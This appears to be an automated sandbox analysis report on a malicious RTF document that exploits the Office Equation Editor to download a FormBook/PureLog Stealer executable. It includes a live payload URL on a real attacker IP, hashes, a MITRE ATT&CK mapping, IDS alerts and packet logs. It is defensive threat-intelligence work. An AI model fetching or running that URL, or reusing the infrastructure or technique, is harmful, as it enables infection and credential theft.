                Source: Yara matchFile source: 00000005.00000002.367170446.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 5.2.winiti.exe.240000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.240000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.253505c.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.253505c.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.366993516.0000000000240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.367170446.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts32
                Exploitation for Client Execution                		1
                DLL Side-Loading                		111
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                Security Software Discovery                		Remote Services11
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media12
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection                		NTDS1
                Remote System Discovery                		Distributed Component Object ModelInput Capture21
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                DzokrPQPdy.rtf100%AviraHEUR/Rtf.Malformed

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\winiti.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://104.219.239.104/80/winiti.exe100%Avira URL Cloudmalware
                http://104.219.239.104/80/winiti.exeRea0%Avira URL Cloudsafe
                http://104.219.239.104/80/winiti.exekkC:0%Avira URL Cloudsafe
                http://104.219.239.104/80/winiti.exej0%Avira URL Cloudsafe
                http://104.219.239.104/80/winiti.exez0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://104.219.239.104/80/winiti.exetrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://104.219.239.104/80/winiti.exeReaEQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.exekkC:EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.exejEQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.exezEQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                104.219.239.104
                		unknownUnited States
                		27176DATAWAGONUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1483003
                Start date and time:2024-07-26 13:42:12 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 53s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:DzokrPQPdy.rtf
                renamed because original name is a hash value
                Original Sample Name:0a9c028203a8416be8db7371550d0fb5.rtf
                Detection:MAL
                Classification:mal100.troj.expl.evad.winRTF@7/9@0/1
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 88%
                • Number of executed functions: 65
                • Number of non-executed functions: 59
                Cookbook Comments:
                • Found application associated with file extension: .rtf
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Scroll down
                • Close Viewer

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
                • Execution Graph export aborted for target EQNEDT32.EXE, PID 2344 because there are no executed function
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtEnumerateValueKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: DzokrPQPdy.rtf

                Simulations

                Behavior and APIs

                TimeTypeDescription
                07:43:03API Interceptor275x Sleep call for process: EQNEDT32.EXE modified
                07:43:07API Interceptor27x Sleep call for process: winiti.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                104.219.239.104RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104/80/winiti.exe
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104/80/winiti.exe
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104/80/winiti.exe
                irlsever.docGet hashmaliciousFormBookBrowse
                • 104.219.239.104/54/winiti.exe
                54.xlsGet hashmaliciousFormBookBrowse
                • 104.219.239.104/54/winiti.exe

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                DATAWAGONUSRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104
                irlsever.docGet hashmaliciousFormBookBrowse
                • 104.219.239.104
                54.xlsGet hashmaliciousFormBookBrowse
                • 104.219.239.104
                CATALOGUE.exeGet hashmaliciousRedLineBrowse
                • 172.81.131.198
                file.exeGet hashmaliciousCMSBruteBrowse
                • 104.219.232.59
                Qzr31SUgrS.rtfGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                1713283209b718b3402f0849bd96c1191ce385ad0742966accbbfb52b7b95b60820687e4a6909.dat-decoded.exeGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                OFFER DETAIL 75645.xlsGet hashmaliciousRemcosBrowse
                • 104.219.239.56

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                    RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                      C:\Users\user\AppData\Roaming\winiti.exeRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                        RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                          RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe

                            Download File
                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):951296
                            Entropy (8bit):7.752827643333699
                            Encrypted:false
                            SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                            MD5:1F5C95D40C06C01300F0A6592945A72D
                            SHA1:79A217ED19833EFCF640FFD8BB04803E9F30D6F4
                            SHA-256:434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                            SHA-512:3CD70090E071E43B22A3638D8CDF13874C5DA34AFF2CB314E170FEDA59D630594314F45708797D83A47ED645A7F07755AC10F4A438858E6673CE560FE5F57975
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Joe Sandbox View:
                            • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                            • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                            • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.f..............0..x............... ........@.. ....................................@....................................O...................................(m..T............................................ ............... ..H............text...$v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...........LU......I...PZ.................................................}.....r...p}......}.....(.......(.....*...}.....r...p}......}.....(.......(.......}....*..0..............r...ps......o.....r...p...s.....s......s.........o....&..o.....o....}.....{.....{....o.............o....( ...&.......o!......*.........._b.. .......tw.......0............{....r...po".....{....r...po".....{....r...po".....{.....{.....%.o#.....o#.....{....r...po".....{....r...po".....{....r...po".....

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8ED147A-38A5-4446-BB43-829C93FD3F73}.tmp

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:CE338FE6899778AACFC28414F2D9498B
                            SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                            SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                            SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{74EA4F82-44B4-43B5-B2B1-782909A0E45D}.tmp

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):8704
                            Entropy (8bit):3.5545147302516895
                            Encrypted:false
                            SSDEEP:192:QivRy8FTydoCB1GiavHhLKcgeUXWZpBIJzeDkkWSP4HZnq7W:D4cSd1DyHhrgL2PIJzakkF4HJIW
                            MD5:33A42F59FD204037F4691C3C457A2A82
                            SHA1:1BCBB4C00924C7E67CD428E6185A26F6942E0466
                            SHA-256:92FF89F93715E7DDB979CC82CDFC0443C9939D6ED01C6D119615FF95875659E6
                            SHA-512:8F6502A05D4F9F55E0ED06C5455F551544FB96964D08AF57062F34AF4A674E09C442E4673CCA22EEE93418FA300A6C5CC49303CD8F0FCA9561C2BB1F60E9F0E5
                            Malicious:false
                            Reputation:low
                            Preview:..................6.4.1.1.6.8.5.4./.<.`.?.2.:...~.5.7.$.-.|.-.+.].,.|.2./.?.5.$.,.;.^.?.+.!...8./...~.].%.......6.^.3./.;.8...4.#.[.....?.>.).:.5.@.2.=.?.0.?.?.9.7.(.+...6...#.+.`.'.5.:.).;.*.(.5.?.?.@.7...;.6.?.&.4.%.:.2.5.[.7.5.6.?.1.?.^.]...&.[.&.&.&.+.*.>.7.-.%.1.?.8.?.%.6.$.*.!.;.|.#.?._.2.0.=./.!.~.+.'.%.?.:.?.%.[.4.'.].?./.,.|.?.`.8.(.?._.#./.).1.|.>.9.%.-.`.`.`.6...6.4.;.0.7.3.*.%.%.,.$.?.3.%.<./.'.'.@./._.9.'...?...4.`._.,.#.1.$.`.>.5.#.*.?.6.<.~.<.'.?.=.;.&.%.0.&.#.?./...?.*.$.?...&.....7.].#.?...?.~.?.%.,.?.#.8./.'.&.).:.?...4.$.?.7.7.*.4.*.^.7.0.?.6.?.-.....).^._.`.?.9.=.:.%.`.....|.$.+.?.].'.0.~.]..._.1.,.;.!...7...~.?.?.2.9.`.;.:.?.<.?._.[.^.?.5.*.@._.0._.6.*.,.?.>.;...-.?.>.1.0.@.|.@.*.=.*.?.!.>.,.].`.2.,.'.:.*.*.[.3.#.7.].?.8.>.2.$.~.@...1.?.,.-.%.?.7.'...<.&.@.+.).|.-.'.*.!.4.!.2.&.?.7.2.&.=.5.].#./.?.`._.|.&.,.-.).$.@.9._.2.$.,.&.+.).7.`.2.>./...%.<.?.#.+.&._.`.:.3.^./.'.1.=.2.%.-.'.7.`.%.5.%.....9.9.?.6.+.%.`.+.0...?.>.1.$.%.8._.%.?.%.0.[.).(.).!...<.%.*.?.%.&.~.-.#.

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A14C26B1-EEA7-4E1B-A080-B2F59643795F}.tmp

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05390218305374581
                            Encrypted:false
                            SSDEEP:3:ol3lYdn:4Wn
                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DzokrPQPdy.LNK

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Fri Jul 26 10:43:02 2024, length=84055, window=hide
                            Category:dropped
                            Size (bytes):1014
                            Entropy (8bit):4.56477267139509
                            Encrypted:false
                            SSDEEP:12:8BLCsFgXg/XAlCPCHaXeBKgB/5YXX+WDqMwWIhUoicvbcG4NUkDtZ3YilMMEpxRD:8B1/XTuAg4XdqMq4egHXDv3qmk7N
                            MD5:001550B880B12383A2ABBB99EF94170E
                            SHA1:564716C567479F8E2564A71FE8F679960C056F91
                            SHA-256:3CA7B40D320DA098DA0C558E3554DD4F8DC3838F8BB5D8AF8C353E1BA5B768B5
                            SHA-512:F0FDA29EAC2DBF2856C350C6396BEB8B8F13A1DCD91A2C31A079DB060A65F242A270172AF9620412B1CF094009D7A5BBB0ED0D55F675037E276FDE7F260DB6A6
                            Malicious:false
                            Preview:L..................F.... ....I..r....I..r..."...P...WH...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X]]..user.8......QK.X.X]]*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.WH...Xb] .DZOKRP~1.RTF..J.......WE..WE.*.........................D.z.o.k.r.P.Q.P.d.y...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\258555\Users.user\Desktop\DzokrPQPdy.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.z.o.k.r.P.Q.P.d.y...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......258555..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8

                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:Generic INItialization configuration [folders]
                            Category:dropped
                            Size (bytes):55
                            Entropy (8bit):4.576547667952106
                            Encrypted:false
                            SSDEEP:3:HqYcYm4BKVcYv:HZ0h
                            MD5:200B13F414CD26841EECB10CCCFE936F
                            SHA1:39C267874783335E54D032183EDCF6A4D46BEC6E
                            SHA-256:8DBB39AA868E63AF795A98946639B8D70793F5614AFA7063DAA733A7CA87E0E8
                            SHA-512:9533BF23F0129E95898BD13014BAA7229E3C1540EAAED8CF86BDBC02518F05004AE874D4763BAA7AEF1EB46945AFE2FD90D836782D635444CC5E727DE78FA726
                            Malicious:false
                            Preview:[misc]..DzokrPQPdy.LNK=0..[folders]..DzokrPQPdy.LNK=0..

                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):2.4797606462020307
                            Encrypted:false
                            SSDEEP:3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
                            MD5:EB62D355909FD3DD98A808A4D456667D
                            SHA1:71A4875D461DDDB4D9EFA05E2529D67E79E558C2
                            SHA-256:4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
                            SHA-512:542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
                            Malicious:false
                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                            C:\Users\user\AppData\Roaming\winiti.exe

                            Download File
                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):951296
                            Entropy (8bit):7.752827643333699
                            Encrypted:false
                            SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                            MD5:1F5C95D40C06C01300F0A6592945A72D
                            SHA1:79A217ED19833EFCF640FFD8BB04803E9F30D6F4
                            SHA-256:434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                            SHA-512:3CD70090E071E43B22A3638D8CDF13874C5DA34AFF2CB314E170FEDA59D630594314F45708797D83A47ED645A7F07755AC10F4A438858E6673CE560FE5F57975
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Joe Sandbox View:
                            • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                            • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                            • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.f..............0..x............... ........@.. ....................................@....................................O...................................(m..T............................................ ............... ..H............text...$v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...........LU......I...PZ.................................................}.....r...p}......}.....(.......(.....*...}.....r...p}......}.....(.......(.......}....*..0..............r...ps......o.....r...p...s.....s......s.........o....&..o.....o....}.....{.....{....o.............o....( ...&.......o!......*.........._b.. .......tw.......0............{....r...po".....{....r...po".....{....r...po".....{.....{.....%.o#.....o#.....{....r...po".....{....r...po".....{....r...po".....

                            C:\Users\user\Desktop\~$okrPQPdy.rtf

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):2.4797606462020307
                            Encrypted:false
                            SSDEEP:3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
                            MD5:EB62D355909FD3DD98A808A4D456667D
                            SHA1:71A4875D461DDDB4D9EFA05E2529D67E79E558C2
                            SHA-256:4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
                            SHA-512:542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
                            Malicious:false
                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                            Static File Info

                            General

                            File type:Rich Text Format data, version 1
                            Entropy (8bit):2.564253730925419
                            TrID:
                            • Rich Text Format (5005/1) 55.56%
                            • Rich Text Format (4004/1) 44.44%
                            File name:DzokrPQPdy.rtf
                            File size:84'055 bytes
                            MD5:0a9c028203a8416be8db7371550d0fb5
                            SHA1:2f576cdfbf4f60918676f6583265c504bdeefa21
                            SHA256:a424c4312f97747efa22a627aa0c77c4f11022d171e11d3eeff00dd77b737520
                            SHA512:51d92688abee365f550552c565ebc422000c6cdf6a0e58528922bde4323906cd85d3dcf7d29fb52adf9cdc4c59e3310704a25657b5a9683ed041087f7db01b69
                            SSDEEP:384:kwiGEC30k0fWHuaN6oQeO3seC31xcxwV+k629/sYdhpfsl4ZnxP941:N1WWPNxssN31xcxc+kRsYdkl4Znr0
                            TLSH:FC83D05D9B8F49A5CB50A337131A4E4806FCB33EB30156B274AC97713BAD93D08A95BC
                            File Content Preview:{\rtf1.............{\*\groupTop920443172 \(}.{\664116854/<`?2:.~57$-|-+],|2/?5$,;^?+!.8/.~]%...6^3/;8.4#[..?>):5@2=?0??97(+.6.#+`'5:);*(5??@7.;6?&4%:25[756?1?^].&[&&&+*>7-%1?8?%6$*!;|#?_20=/!~+'%?:?%[4']?/,|?`8(?_#/)1|>9%-```6.64;073*%%,$?3%</''@/_9'.?.4`

                            File Icon

                            Icon Hash:2764a3aaaeb7bdbf

                            Static RTF Info

                            Objects

                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                            000000F7Ehno

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                            2024-07-26T13:43:07.323801+0200TCP2022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M18049163104.219.239.104192.168.2.22
                            2024-07-26T13:43:07.504654+0200TCP2022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M28049163104.219.239.104192.168.2.22

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 26, 2024 13:43:06.510478973 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:06.744957924 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:06.745085001 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:06.745285034 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:06.750489950 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.323700905 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.323726892 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.323745966 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.323785067 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.323787928 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.323787928 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.323787928 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.323801041 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.323817968 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.323837042 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.323925972 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.323925972 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.323926926 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.323926926 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.324183941 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.324197054 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.324208975 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.324383020 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.324383020 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.328825951 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.328883886 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.329052925 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.329052925 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.329317093 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.414375067 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.414386988 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.414397001 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.414407015 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.416501999 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.419192076 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.419202089 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.419239044 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:07.420507908 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:07.420507908 CEST4916380192.168.2.22104.219.239.104
